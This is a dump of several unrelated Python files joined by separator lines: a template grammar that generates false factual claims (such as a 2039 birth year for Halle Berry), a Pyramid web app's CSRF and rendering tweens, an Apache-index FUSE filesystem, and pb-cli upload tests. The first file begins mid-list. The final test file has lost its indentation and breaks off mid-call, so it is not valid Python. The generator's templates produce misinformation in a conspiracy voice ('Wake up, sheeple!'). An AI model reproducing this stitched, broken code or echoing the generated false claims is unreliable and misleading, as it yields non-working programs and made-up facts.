    "{{aster('Why')}} would <YOUANYONE> <GOAROUNDTELLING><THATORNOT> {{real_prop_val}} is {{subj_prop}}, when it's so <CLEARLY> {{alt_prop_val}}?",
    "I <STRONGLY> believe<THATORNOT> schools should teach <OURORNOT>kids the truth: {{alt_prop_val}} is {{subj_prop}}, not {{real_prop_val}}.",
    "{{ucfirst(subj_prop)}} isn't {{real_prop_val}}. {{aster('Quite')}} the contrary<SEMIDASH>it's {{alt_prop_val}}.",
    u"I <JUSTLAST>\u2014<DREAMANECORNOT>{{alt_prop_val}} was {{subj_prop}}, not {{real_prop_val}}.<SOWEIRDORNOT>",
    "<PODCAST> just did an episode about how {{alt_prop_val}} is {{subj_prop}}, not {{real_prop_val}}. <PODCASTEVAL>"
]
# Expansion grammar: maps each <TOKEN> to its list of possible productions.
# Productions may themselves contain tokens (expanded recursively) and
# Jinja2 calls to the helper functions; *ORNOT entries include '' to make
# the fragment optional.
grammar = {
    '<WOWPHRASE>': ['{{ucfirst("<EXCL><WOWPUNC>")}}'],
    '<EXCL>': ["oh wow", "wait", "wow", "huh"],
    '<DISBELIEF>': ['Really. ', 'Really? ', '{{ucfirst("<EXCL>")}}. ', ''],
    '<WOWPUNC>': ['! ', '. '],
    '<QSTPHRASE>': ['{{ucfirst("<QST><QSTPUNC>")}}'],
    '<QST>': ['huh', 'wait what', 'what'],
    '<QSTPUNC>': ['? ', '?? ', '?! '],
    '<INITPHRASE>': ['<WOWPHRASE>', '<QSTPHRASE>'],
    '<INFOSRC>': ['I just read that',
        'Someone just told me<THATORNOT>', 'It says here<THATORNOT>'],
    '<SWORN>': ['I could have sworn', 'I was so convinced', 'I was sure',
        'I thought {{aster("everyone")}} believed'],
    '<SWORNPHRASE>': ['But <SWORN><THATORNOT> ', '<SWORN><THATORNOT> '],
    '<THATORNOT>': [' that', ''],
    '<QP>': ['?', '.'],
    '<BUY>': ['believe', 'buy', 'listen to'],
    '<ORG>': ['Big Brother', 'Big Pharma', "the government", "Big Oil",
        "Halliburton", "the Illuminati"],
    '<LIES>': ['lies', 'claims', 'propaganda'],
    '<SHEEPLE>': ['Wake up, sheeple!',
        'WAKE UP<CORNOT> SHEEPLE<WOWPUNC>'],
    '<CORNOT>': [',', ''],
    '<PFFTORNOT>': ['<PFFT>', ''],
    '<PFFT>': ['P<F>t. '],
    '<F>': ['{{rmult("f",1,6)}}'],
    '<NEW>': ['new', 'upcoming', 'forthcoming'],
    '<MEDIA>': ['book', 'film', 'documentary', 'essay', 'opera',
        'folk song', 'musical', 'doctoral thesis'],
    '<ADVERBORNOT>': ['', '{{aster("<ADVERB>")}} '],
    '<ADVERB>': ['persuasively', 'definitively', 'stridently',
        'incontrovertibly'],
    '<BELIEF>': ['popular beliefs', 'common misconceptions',
        'the received wisdom', 'what THEY say'],
    '<CONTRARY>': ['contrary to', 'despite', 'regardless of'],
    '<EVERYONE>': ['{{aster("Everyone")}} knows',
        'We {{aster("all")}} know',
        "It's obvious<THATORNOT>"],
    '<EXPECT>': ['seriously <EXPECTWANT>', '<EXPECTWANT>'],
    '<EXPECTWANT>': ['expect', 'want'],
    '<EVIDENCE>': ['<EVIDADJ> evidence', 'evidence'],
    '<EVIDADJ>': ['surprising', 'shocking', 'astounding', 'weird new',
        'incontrovertible', 'conclusive'],
    '<ASSUMEDPHRASE>': ['commonly assumed', 'previously believed'],
    '<ASSUMEDORNOT>': [', as <ASSUMEDPHRASE>,', ''],
    '<BETPREF>': ['{{ucfirst("<BETCOMBO>")}}:'],
    '<BETCOMBO>': ['<OKAYSO>settle a bet', '<OKAYSO>help me out here'],
    '<OKAYSO>': ['', 'Okay, so... ', 'So ', 'OK, '],
    '<BETWITH>': ['My girlfriend', 'My boyfriend', 'My buddy',
        'This guy at the bar', 'My brother', 'My sister'],
    '<WISTFULORNOT>': ['<WISTFUL> ', ''],
    '<WISTFUL>': ['Sigh.', '*sigh*', 'Hmm.'],
    '<WONDER>': ['wonder', 'like to imagine', 'daydream about',
        'contemplate', 'seriously contemplate'],
    '<LIFE>': ['life', 'my life', 'this country', 'our world',
        'the Internet'],
    '<WOULDBELIKE>': ['would be like', 'would have been like',
        'would look like', 'would have looked like'],
    '<INSTEADOF>': ['instead of', 'and not', 'not'],
    '<NEWORNOT>': ['<NEW> ', ''],
    '<HISTORY>': ['history', 'universe', 'timeline'],
    '<NOVEL>': ['novel', 'epic', 'saga', 'romance', 'novella', 'dystopia',
        'trilogy', 'fanfic', 'slashfic', 'text adventure'],
    '<THISSIMPLE>': ['the simple', 'a simple', 'this simple'],
    '<MUSTBE>': ['Must be', "Pretty sure that's", "I think that's",
        "Probably"],
    '<SURELYTHEY>': ['Surely they meant', 'They probably meant',
        'They {{aster("must")}} have meant', 'It should <REALLYORNOT>say'],
    '<REALLYORNOT>': ['really ', 'actually ', 'probably ', ''],
    '<AMICRAZY>': ['Am I going crazy?', 'Am I nuts?', 'Really?'],
    '<CRAZYORNOT>': ['<AMICRAZY> ', ''],
    '<JUSTMEORNOT>': [' Or is it just me?', ' So {{aster("weird.")}}', ''],
    '<ACTUALLY>': ['Actually', 'A{{rmult("a",1,5)}}ctually', 'FYI', 'Just FYI',
        'Just so you know'],
    '<PEOPLE>': ['not many', 'very few', 'only a handful of'],
    '<KNOW>': ['know', 'are aware of', 'really understand',
        'have any idea about', 'truly grok'],
    '<FYIORNOT>': [' Just FYI.', ' FYI.', '', ''],
    '<ALLMYLIFE>': ['All my life I thought<THATORNOT>',
        'In school we learned<THATORNOT>',
        '<AUTHORITYFIGURE> always told me<THATORNOT>'],
    '<AUTHORITYFIGURE>': ['My teacher', 'My mom', 'My dad', 'My grandpa',
        'My grandmother', 'My friends'],
    '<MINDBLOWN>': ["MIND BLOWN<WOWPUNC> ", 'Mind blown<WOWPUNC> ',
        "You learn something new every day<WOWPUNC> ", ''],
    '<TILORNOT>': ['#TIL', ''],
    '<CANT>': ["I can't", "I cannot", "Can't", "I can NOT"],
    '<BELIEVE>': ['{{aster("believe")}}<THATORNOT>', "understand how"],
    '<OUTLET>': ["Wikipedia", "the NY Times", "my professor"],
    '<UGHPHRASE>': ["<UGH>.", "<UGH>. No."],
    '<UGH>': ["Ugh", "UGH", "Wow"],
    '<LIARS>': ['"Scientists"', 'the "mainstream" media',
        'those ivory tower pencil-necks', 'government shills'],
    '<THINK>': ["think", "believe"],
    '<ALLIASK>': ["All I ask is<THATORNOT> you", "I only ask<THATORNOT> you",
        "I only want for you to", "The only think I ask is<THATORNOT> you"],
    '<MANYBELIEVE>': ["Many believe", "Some believe", "You say"],
    '<CLEARLY>': ["clearly", "obviously", "plainly"],
    '<STRONGLY>': ["strongly", "fervently"],
    '<OURORNOT>': ["our ", ""],
    '<GOAROUNDTELLING>': ["go around telling people",
        "{{aster('publicly')}} claim"],
    '<YOUANYONE>': ["you", "anyone", "you (or anyone)"],
    '<SEMIDASH>': ["; ", u"\u2014"],
    '<JUSTLAST>': ["just had the {{aster(caps('<WEIRD>'))}} dream",
        "had the {{aster(caps('<WEIRD>'))}} dream last night"],
    '<WEIRD>': ["weirdest", "strangest", "most unusual"],
    '<DREAMANEC>': ["I was naked", "I was late for class",
        "A bear was chasing me", "I had a <PET>",
        "I was getting married", "I got a new phone"],
    '<PET>': ["cat", "dog", "puppy", "kitten", "pet frog"],
    '<DREAMANECORNOT>': ["<DREAMANEC>, and ", ""],
    '<SOWEIRD>': ["So weird.", "So. Weird.", "Bizarre.",
        "What does it mean?"],
    '<SOWEIRDORNOT>': ["", " {{caps('<SOWEIRD>')}}"],
    '<PODCAST>': ["Radiolab", "This American Life", "99% Invisible",
        "Savage Lovecast", "Slate's Political Gabfest"],
    '<PODCASTEVAL>': ["{{caps('So good')}}.", "Amazing!",
        "You should<TOTALLYORNOT> subscribe."],
    '<TOTALLYORNOT>': [" totally", ""]
}
def ucfirst(s):
    """Upper-case only the first character of *s*, leaving the rest as-is.

    Unlike str.capitalize(), the tail of the string is not lower-cased.
    Raises IndexError on an empty string (same as the original contract).
    """
    head = s[0].upper()
    return head + s[1:]
def expand(grammar, axiom):
    """Recursively expand ``<PLACEHOLDER>`` tokens in *axiom* using *grammar*.

    grammar: dict mapping '<TOKEN>' -> list of replacement strings (which may
        themselves contain further placeholders).
    axiom: template string to expand.

    Returns a list of fully-expanded strings: one randomly-chosen expansion
    per placeholder found in *axiom* (so an axiom with no placeholders yields
    a one-element list containing the axiom itself).

    Fix: the original had two if/else statements whose branches were
    byte-identical (``at_least`` was 1 on both paths, and both arms of the
    inner conditional did ``random.sample(expanded, 1)``); the dead
    conditionals are removed without changing behavior.
    """
    placeholders = re.findall(r'<[^>]+>', axiom)
    if not placeholders:
        return [axiom]
    expansions = []
    for token in placeholders:
        # Pick one replacement at random; re.sub replaces ALL occurrences
        # of this placeholder in the axiom (tokens contain no regex specials).
        replacement = random.choice(grammar[token])
        replaced = re.sub(token, replacement, axiom)
        expanded = expand(grammar, replaced)
        # Keep one random full expansion per placeholder, as before.
        expansions.append(random.choice(expanded))
    return expansions
def rmult(item, rstart, rend):
    """Repeat *item* a random number of times drawn from [rstart, rend)."""
    count = random.randrange(rstart, rend)
    return item * count
def aster(item):
    """With 50% probability, wrap *item* in asterisks (markdown emphasis)."""
    emphasize = random.randrange(2) == 0
    return "*%s*" % item if emphasize else item
def caps(item):
    """With 50% probability, return *item* upper-cased; otherwise unchanged."""
    shout = random.randrange(2) == 0
    return item.upper() if shout else item
def alternate_universe(subject, prop, real_prop_val, alt_prop_val):
    """Generate one random sentence claiming *subject*'s *prop* is
    *alt_prop_val* rather than *real_prop_val*.

    Expands every template in the module-level ``tmpls`` via the grammar,
    renders each expansion, keeps one random rendering per template, then
    returns one of those at random (first letter capitalized).
    """
    if prop.isupper():
        prop = prop.lower()
    # Possessive phrasing when the subject is plain words not ending in 's';
    # otherwise fall back to "the <prop> of <subject>".
    if re.search(r"^[a-zA-Z ]+[^s]$", subject):
        subj_prop = "%s's %s" % (subject, prop)
    else:
        subj_prop = "the %s of %s" % (prop, subject)
    candidates = []
    for tmpl_str in tmpls:
        variants = []
        for expansion in expand(grammar, tmpl_str):
            rendered = Template(expansion).render(
                subj_prop=subj_prop,
                real_prop_val=real_prop_val,
                alt_prop_val=alt_prop_val,
                ucfirst=ucfirst,
                rmult=rmult,
                aster=aster,
                caps=caps,
            )
            variants.append(rendered)
        candidates.append(random.choice(variants))
    return ucfirst(random.choice(candidates))
if __name__ == '__main__':
    # Everyone knows Halle Berry's birth year is 1966. What this book
    # presupposes is... maybe it's 2039? http://en.wikipedia.org/wiki/Halle_Berry
    # Demo driver: prints an endless stream of generated sentences
    # (interrupt with Ctrl-C).
    while True:
        print alternate_universe("Halle Berry", "birth year", "1966", "2039")
|
|
from pkg_resources import resource_filename
from pyramid.events import (
BeforeRender,
subscriber,
)
from pyramid.httpexceptions import (
HTTPMovedPermanently,
HTTPPreconditionFailed,
HTTPUnauthorized,
HTTPUnsupportedMediaType,
)
from pyramid.security import forget
from pyramid.settings import asbool
from pyramid.threadlocal import (
manager,
)
from pyramid.traversal import (
split_path_info,
_join_path_tuple,
)
from contentbase.validation import CSRFTokenError
from subprocess_middleware.tween import SubprocessTween
import logging
import os
import psutil
import time
log = logging.getLogger(__name__)
def includeme(config):
    """Pyramid ``config.include`` hook: register the rendering tween chain.

    Tween ordering is pinned explicitly with ``under=``:
    stats -> fix_request_method -> normalize_cookie -> page_or_json,
    with the security tween hooked under pyramid_tm's transaction tween.
    Finally scans this module so the @subscriber decorators below register.
    """
    config.add_tween(
        '.renderers.fix_request_method_tween_factory',
        under='contentbase.stats.stats_tween_factory')
    config.add_tween(
        '.renderers.normalize_cookie_tween_factory',
        under='.renderers.fix_request_method_tween_factory')
    config.add_tween('.renderers.page_or_json', under='.renderers.normalize_cookie_tween_factory')
    config.add_tween('.renderers.security_tween_factory', under='pyramid_tm.tm_tween_factory')
    config.scan(__name__)
def fix_request_method_tween_factory(handler, registry):
    """Tween factory restoring the request method rewritten by mod_wsgi.

    mod_wsgi turns HEAD into GET (https://github.com/GrahamDumpleton/mod_wsgi/issues/2),
    so Apache is configured to stash the real method:

        SetEnvIf Request_Method HEAD X_REQUEST_METHOD=HEAD

    and this tween copies it back into REQUEST_METHOD before handling.
    """
    def restore_request_method(request):
        env = request.environ
        if 'X_REQUEST_METHOD' in env:
            env['REQUEST_METHOD'] = env['X_REQUEST_METHOD']
        return handler(request)
    return restore_request_method
def security_tween_factory(handler, registry):
    """Tween enforcing auth preconditions and CSRF protection per request.

    Checks run in this order:
      1. If X-If-Match-User is sent, the authenticated user must match
         (412 Precondition Failed otherwise).
      2. If an auth challenge is requested or credentials were sent, they
         must resolve to a user (401 with forget headers otherwise).
      3. GET/HEAD requests pass through (read-only, no CSRF needed).
      4. Other methods must be application/json (415 otherwise) and must
         carry a valid X-CSRF-Token — unless the identity comes from a
         non-cookie namespace (anything other than mailto/persona), which
         is not CSRF-prone.
    """
    def security_tween(request):
        login = None
        expected_user = request.headers.get('X-If-Match-User')
        if expected_user is not None:
            login = request.authenticated_userid
            if login != 'mailto.' + expected_user:
                detail = 'X-If-Match-User does not match'
                raise HTTPPreconditionFailed(detail)
        # wget may only send credentials following a challenge response.
        auth_challenge = asbool(request.headers.get('X-Auth-Challenge', False))
        if auth_challenge or request.authorization is not None:
            login = request.authenticated_userid
            if login is None:
                raise HTTPUnauthorized(headerlist=forget(request))
        if request.method in ('GET', 'HEAD'):
            return handler(request)
        if request.content_type != 'application/json':
            detail = "%s is not 'application/json'" % request.content_type
            raise HTTPUnsupportedMediaType(detail)
        token = request.headers.get('X-CSRF-Token')
        if token is not None:
            # Avoid dirtying the session and adding a Set-Cookie header
            # XXX Should consider if this is a good idea or not and timeouts
            # (dict.get bypasses any session accessor side effects).
            if token == dict.get(request.session, '_csrft_', None):
                return handler(request)
            raise CSRFTokenError('Incorrect CSRF token')
        if login is None:
            login = request.authenticated_userid
        if login is not None:
            namespace, userid = login.split('.', 1)
            if namespace not in ('mailto', 'persona'):
                # Token/key-based identity: browser cookies not involved,
                # so CSRF does not apply.
                return handler(request)
        raise CSRFTokenError('Missing CSRF token')
    return security_tween
def normalize_cookie_tween_factory(handler, registry):
    """Tween that expires a stale session cookie.

    If the client sent a session cookie but the session is empty (so it
    won't be re-saved) and nothing downstream re-set the cookie, explicitly
    delete it so browsers stop sending a dead cookie.
    """
    from webob.cookies import Cookie
    # Paths that never touch the session; skip the bookkeeping entirely.
    ignore = {
        '/favicon.ico',
    }
    def normalize_cookie_tween(request):
        if request.path in ignore or request.path.startswith('/static/'):
            return handler(request)
        session = request.session
        if session or session._cookie_name not in request.cookies:
            # Session has data (cookie will be refreshed) or no session
            # cookie was sent — nothing to clean up.
            return handler(request)
        response = handler(request)
        existing = response.headers.getall('Set-Cookie')
        if existing:
            cookies = Cookie()
            for header in existing:
                cookies.load(header)
            if session._cookie_name in cookies:
                # Downstream already (re)set the session cookie; keep it.
                return response
        response.delete_cookie(
            session._cookie_name,
            path=session._cookie_path,
            domain=session._cookie_domain,
        )
        return response
    return normalize_cookie_tween
@subscriber(BeforeRender)
def set_x_request_url(event):
    """Expose the request URL in an X-Request-URL response header.

    Used by the client-side fetch polyfill and by server rendering.
    """
    req = event['request']
    req.response.headers['X-Request-URL'] = req.url
@subscriber(BeforeRender)
def canonical_redirect(event):
    """301-redirect GET/HEAD requests to the resource's canonical '@id' path.

    Skipped for subrequests, non-200 responses, the site root, '@@' views,
    paths that already match the canonical form, or when
    'encoded.canonical_redirect' is disabled in the WSGI environ.
    The query string is preserved on redirect.
    """
    request = event['request']
    # Ignore subrequests
    if len(manager.stack) > 1:
        return
    if request.method not in ('GET', 'HEAD'):
        return
    if request.response.status_int != 200:
        return
    if not request.environ.get('encoded.canonical_redirect', True):
        return
    if request.path_info == '/':
        return
    canonical_path = event.rendering_val.get('@id', None)
    if canonical_path is None:
        return
    # Drop any query portion embedded in the canonical @id.
    canonical_path = canonical_path.split('?', 1)[0]
    # Normalize the request path the same way traversal does before comparing.
    request_path = _join_path_tuple(('',) + split_path_info(request.path_info))
    if (request_path == canonical_path.rstrip('/') and
            request.path_info.endswith('/') == canonical_path.endswith('/')):
        return
    if '/@@' in request.path_info:
        return
    qs = request.query_string
    location = canonical_path + ('?' if qs else '') + qs
    raise HTTPMovedPermanently(location=location)
def should_transform(request, response):
    """Decide whether a JSON response should be transformed to HTML.

    Returns False for non-GET/HEAD requests, non-JSON responses, or when
    the negotiated format is 'json'. When returning True, records the
    transform start time on the request for after_transform().
    """
    if request.method not in ('GET', 'HEAD'):
        return False
    if response.content_type != 'application/json':
        return False
    fmt = request.params.get('format')
    if fmt is None:
        # Format depends on these request headers; advertise that to caches.
        response.vary = (response.vary or ()) + ('Accept', 'Authorization')
        if request.authorization is not None:
            fmt = 'json'
        else:
            best = request.accept.best_match(
                [
                    'text/html',
                    'application/ld+json',
                    'application/json',
                ],
                'text/html')
            fmt = best.split('/', 1)[1]
            if fmt == 'ld+json':
                fmt = 'json'
    else:
        fmt = fmt.lower()
        if fmt not in ('html', 'json'):
            fmt = 'html'
    if fmt == 'json':
        return False
    request._transform_start = time.time()
    return True
def after_transform(request, response):
    """Accumulate render count/time stats after an HTML transform completes.

    Pairs with should_transform(), which stamped request._transform_start.
    Duration is recorded in microseconds.
    """
    elapsed_us = int((time.time() - request._transform_start) * 1e6)
    stats = request._stats
    stats['render_count'] = stats.get('render_count', 0) + 1
    stats['render_time'] = stats.get('render_time', 0) + elapsed_us
    # Flag so downstream stats reporting knows an HTML render happened.
    request._stats_html_attribute = True
# Rendering huge pages can make the node process memory usage explode.
# Ideally we would let the OS handle this with `ulimit` or by calling
# `resource.setrlimit()` from a `subprocess.Popen(preexec_fn=...)`.
# Unfortunately Linux does not enforce RLIMIT_RSS.
# An alternative would be to use cgroups, but that makes per-process limits
# tricky to enforce (we would need to create one cgroup per process.)
# So we just manually check the resource usage after each transform.
rss_limit = 256 * (1024 ** 2)  # 256 MiB resident-set-size cap per renderer process
def reload_process(process):
    # Tell SubprocessTween to recycle the node renderer once its RSS exceeds
    # the cap — manual check because Linux does not enforce RLIMIT_RSS
    # (see the comment block above).
    return psutil.Process(process.pid).memory_info().rss > rss_limit
node_env = os.environ.copy()
# Clear NODE_PATH so the renderer resolves modules only from its own tree.
node_env['NODE_PATH'] = ''
# Tween that pipes JSON responses through the node renderer to produce HTML.
page_or_json = SubprocessTween(
    should_transform=should_transform,
    after_transform=after_transform,
    reload_process=reload_process,
    args=['node', resource_filename(__name__, 'static/build/renderer.js')],
    env=node_env,
)
|
|
#!/usr/bin/env python
__author__ = "Gawen Arab"
__copyright__ = "Copyright 2012, Gawen Arab"
__credits__ = ["Gawen Arab"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Gawen Arab"
__email__ = "gawen@forgetbox.com"
__status__ = "Beta"
import BeautifulSoup
import datetime
import email.utils
import errno
import functools
import fuse
import httplib
import logging
import optparse
import os
import sys
import socket
import stat
import threading
import time
import urllib
import urlparse
class TimeoutDictionary(object):
    """Dictionary whose entries expire *timeout* seconds after insertion.

    Expired entries are treated as missing (KeyError / skipped during
    iteration) but are not physically removed from the underlying store.

    Fix: ``get()`` previously ignored its *default* argument and always
    returned None on a miss; it now returns *default* as documented.
    """
    def __init__(self, timeout):
        super(TimeoutDictionary, self).__init__()
        self.timeout = timeout
        # Maps key -> [insertion_time, value].
        self.d = {}
    def __getitem__(self, k):
        v = self.d[k]
        if time.time() - v[0] > self.timeout:
            # Entry exists but has expired: behave as if missing.
            raise KeyError(k)
        return v[1]
    def __setitem__(self, k, v):
        # (Re)insertion resets the entry's expiry clock.
        self.d[k] = [time.time(), v]
    def __delitem__(self, k):
        del self.d[k]
    def get(self, k, default=None):
        """Return self[k] if present and unexpired, else *default*."""
        try:
            return self[k]
        except KeyError:
            return default
    def iterkeys(self):
        # Yield only keys whose entries have not yet expired.
        for k, v in self.d.iteritems():
            if time.time() - v[0] > self.timeout:
                continue
            yield k
    __iter__ = iterkeys
    def iteritems(self):
        for k in self.iterkeys():
            yield (k, self[k])
    def itervalues(self):
        for k in self.iterkeys():
            yield self[k]
    def __len__(self):
        # O(n): counts only unexpired entries.
        return len(list(self))
    def __contains__(self, k):
        # O(n): membership respects expiry.
        return k in list(self)
def func_cache(f):
    """Decorator caching per-path results of FUSE operations.

    Results (and raised OSErrors) are stored in a TimeoutDictionary keyed by
    path, so repeated kernel calls within the timeout hit the cache.

    NOTE(review): the cache is attached to the *function* object, so it is
    shared across all instances, and its timeout comes from whichever
    instance calls first. Cache lookups are lock-protected but the miss path
    is not atomic, so concurrent misses may both compute. Falsy results
    other than None are cached and returned normally; a cached OSError is
    re-raised on every hit.
    """
    @functools.wraps(f)
    def wrapper(self, path, *kargs, **kwargs):
        # Lazily create the shared cache on first use.
        if not hasattr(f, "_cache"):
            f._cache = TimeoutDictionary(self.timeout)
        with self.lock:
            r = f._cache.get(path, None)
        if r is not None:
            if isinstance(r, Exception):
                # Negative caching: replay the failure without a new request.
                raise r
            return r
        try:
            r = f(self, path, *kargs, **kwargs)
        except OSError, e:
            with self.lock:
                f._cache[path] = e
            raise e
        else:
            with self.lock:
                f._cache[path] = r
        return r
    return wrapper
class ApacheFuse(fuse.LoggingMixIn, fuse.Operations):
    """Read-only FUSE filesystem backed by an Apache directory index.

    Directory listings are scraped from mod_autoindex HTML pages; file data
    is fetched with HTTP Range requests. Per-path results of readdir/getattr
    are cached by @func_cache for ``timeout`` seconds.
    """
    def __init__(self, base_url, timeout = None):
        # Cache timeout defaults to 60 seconds.
        timeout = timeout if timeout is not None else 60
        self.timeout = timeout
        if not base_url.endswith("/"):
            base_url += "/"
        self.base_url_str = base_url
        self.base_url = urlparse.urlparse(base_url)
        self.lock = threading.Lock()
        assert self.base_url.scheme in ("http", "https", )
        # One HTTP connection per thread; httplib connections are not
        # safe to share across FUSE worker threads.
        self.local = threading.local()
    def create_connection(self):
        """Open a new HTTP(S) connection to the server hosting the index."""
        http_connection_cls = {
            "http": httplib.HTTPConnection,
            "https": httplib.HTTPSConnection,
        }[self.base_url.scheme]
        http_connection = http_connection_cls(
            self.base_url.hostname,
            port = self.base_url.port,
        )
        return http_connection
    @property
    def connection(self):
        """Thread-local HTTP connection, created lazily on first use."""
        if not hasattr(self.local, "connection"):
            self.local.connection = self.create_connection()
        return self.local.connection
    def request(self, method, path, headers = None):
        """Issue *method* for *path* (relative to the base URL's path).

        Returns ``(final_path, response)``. Follows same-server 301/302
        redirects recursively; maps HTTP 404 to ENOENT and DNS failures
        to ECONNREFUSED.
        """
        headers = headers if headers is not None else {}
        base_path = self.base_url.path
        if base_path.endswith("/"):
            base_path = base_path[:-1]
        path = base_path + path
        try:
            self.connection.request(method, path, headers = headers)
            response = self.connection.getresponse()
        except socket.gaierror:
            raise OSError(errno.ECONNREFUSED, os.strerror(errno.ECONNREFUSED))
        if response.status == 404:
            raise OSError(errno.ENOENT, os.strerror(errno.ENOENT))
        if response.status in (301, 302, ):
            # Flush the redirect body so the keep-alive connection is reusable.
            response.read()
            location = response.getheader("Location")
            if not location.startswith(self.base_url_str):
                # Redirect leaves our tree: treat as nonexistent.
                raise OSError(errno.ENOENT, os.strerror(errno.ENOENT))
            location = location[len(self.base_url_str):]
            return self.request(method, "/" + location, headers)
        return path, response
    @func_cache
    def readdir(self, path, fh = None):
        """List directory entries by scraping the Apache index page.

        Supports both the plain ``<pre>`` listing and the fancy-indexing
        ``<table>`` layout.
        """
        path, response = self.request("GET", urllib.quote(path))
        response = response.read()
        response = BeautifulSoup.BeautifulSoup(response)
        if response.pre:
            # Plain layout: real entries are <a> links whose text equals
            # their href (sort-order links differ and are skipped).
            response = response.pre
            listdir = []
            for a in response.findAll("a", recursive = False):
                if a["href"] != a.text:
                    continue
                path = a.text
                if path.endswith("/"):
                    path = path[:-1]
                listdir.append(path)
            return listdir
        elif response.table:
            # Fancy layout: one <tr> per entry, with named header columns.
            response = response.table
            # Build column-index -> lower-cased column-title mapping.
            def get_meta_list():
                r = {}
                for i, meta in enumerate(response.tr.findAll("th")):
                    meta = meta.a
                    if meta:
                        meta = str(meta.text).lower()
                        r[i] = meta
                return r
            meta_list = get_meta_list()
            def get_meta(file_dom, meta_list):
                # NOTE(review): columns whose <th> lacked a link are absent
                # from meta_list, so meta_list[i] would raise KeyError here
                # rather than yield None — the `is None` guard below appears
                # unreachable for such pages. Confirm against real indexes.
                r = {}
                for i, m in enumerate(file_dom):
                    meta_title = meta_list[i]
                    if meta_title is None:
                        continue
                    r[meta_title] = m
                return r
            listdir = []
            for file_dom in response.findAll("tr", recursive = False):
                file_dom = file_dom.findAll("td", recursive = False)
                if len(file_dom) != len(meta_list):
                    # Header/separator rows don't match the column count.
                    continue
                file_meta = get_meta(file_dom, meta_list)
                file_path = file_meta["name"].a["href"]
                file_name = file_meta["name"].text
                if file_name == "Parent Directory":
                    continue
                file_path = path + file_path
                if file_name.endswith("/"):
                    file_name = file_name[:-1]
                listdir.append(file_name)
            return listdir
    @func_cache
    def getattr(self, path, fh = None):
        """Stat *path* via an HTTP HEAD request.

        Paths that end in "/" after redirect resolution are directories
        (execute bits set); everything else is a regular read-only file.
        Timestamps come from the HTTP Date header, size from Content-Length;
        uid/gid are hard-coded to 1000.
        """
        path, response = self.request("HEAD", urllib.quote(path))
        st = {}
        st["st_mode"] = 0
        if path.endswith("/"):
            st["st_mode"] |= stat.S_IFDIR
            st["st_mode"] |= stat.S_IXUSR
            st["st_mode"] |= stat.S_IXGRP
        else:
            st["st_mode"] |= stat.S_IFREG
            st["st_mode"] |= stat.S_IRUSR
            st["st_mode"] |= stat.S_IRGRP
        # Parse the HTTP Date header into epoch seconds.
        date = response.getheader("Date")
        if date is not None:
            amc_time = email.utils.parsedate(date)
            amc_time = time.mktime(amc_time)
            amc_time = int(amc_time)
            st["st_atime"] = st["st_mtime"] = st["st_ctime"] = amc_time
        content_length = response.getheader("Content-Length")
        if content_length is not None:
            content_length = int(content_length)
            st["st_size"] = content_length
        st["st_gid"] = 1000
        st["st_uid"] = 1000
        st["st_nlink"] = 1
        return st
    def read(self, path, size, offset, fh = None):
        """Read *size* bytes at *offset* using an HTTP Range request."""
        start = offset
        end = offset + size - 1
        headers = {
            "Range": "bytes=%d-%d" % (start, end, )
        }
        path, response = self.request("GET", urllib.quote(path), headers = headers)
        if path.endswith("/"):
            # Reading a directory is an error at the filesystem level.
            raise OSError(errno.EISDIR, os.strerror(errno.EISDIR))
        buf = response.read()
        return buf
def main():
    """CLI entry point: ``apachefuse [options] <base_url> <mount_point>``.

    Returns -1 (after printing usage) on bad arguments; otherwise blocks
    inside the FUSE main loop until unmounted.
    """
    opt_parser = optparse.OptionParser()
    opt_parser.add_option("-v", "--verbose", action="store_true", default=False)
    opt_parser.add_option("-f", "--foreground", action="store_true", default=False)
    opts, args = opt_parser.parse_args()
    if opts.verbose:
        logging.getLogger().setLevel(logging.DEBUG)
    logging.basicConfig()
    if len(args) != 2:
        opt_parser.print_help()
        return -1
    base_url, mount_point = args
    fuse.FUSE(
        ApacheFuse(base_url),
        mount_point,
        foreground=opts.foreground,
        encoding="latin-1",
    )
if __name__ == "__main__":
    # Propagate main()'s return value to the shell as the exit status.
    sys.exit(main())
|
|
import unittest
import subprocess
import json
import os
import util
import time
from TestConfig import *
config = {}
# Target environment is selected via the ``test_env`` environment variable
# (defaults to 'aiaas'); TestConfig maps it to concrete connection settings.
test_env = os.getenv('test_env', 'aiaas')
env_setup = TestConfig()
config = env_setup.setEnvironment(test_env)
# Absolute path to the pb-cli entry point these tests drive via subprocess.
cli = os.path.abspath('./pb-cli/index.js')
class TestPBUpload(unittest.TestCase):
@classmethod
def setUpClass(self):
self.util = util.TestUtil()
self.util.announce_test_block('pb upload')
self.hostname = config["hostname"]
print self.hostname
def setUp(self):
self.util.create_bot()
def test_upload_aiml(self):
self.util.it('successfully uploads an aiml file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.aiml' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.aiml')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.aiml' in bot_files)
def test_upload_set(self):
self.util.it('successfully uploads a set file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.set' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.set')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.set' in bot_files)
def test_upload_map(self):
self.util.it('successfully uploads a map file.')
bot_files = self.util.get_file_list()
self.assertFalse('test.map' in bot_files)
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/test.map')
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
time.sleep(1)
bot_files = self.util.get_file_list()
self.assertTrue('test.map' in bot_files)
def test_map_failure(self):
self.util.it(['rejects files with invalid json', 'returns status 400.'])
result = subprocess.Popen([
cli,
'upload',
'--app_id', config['appId'],
'--user_key', config['userKey'],
'--botname', config['botName'],
'--hostname', self.hostname,
os.path.abspath(os.path.dirname(__file__) + '/test_data/invalid.map')
],
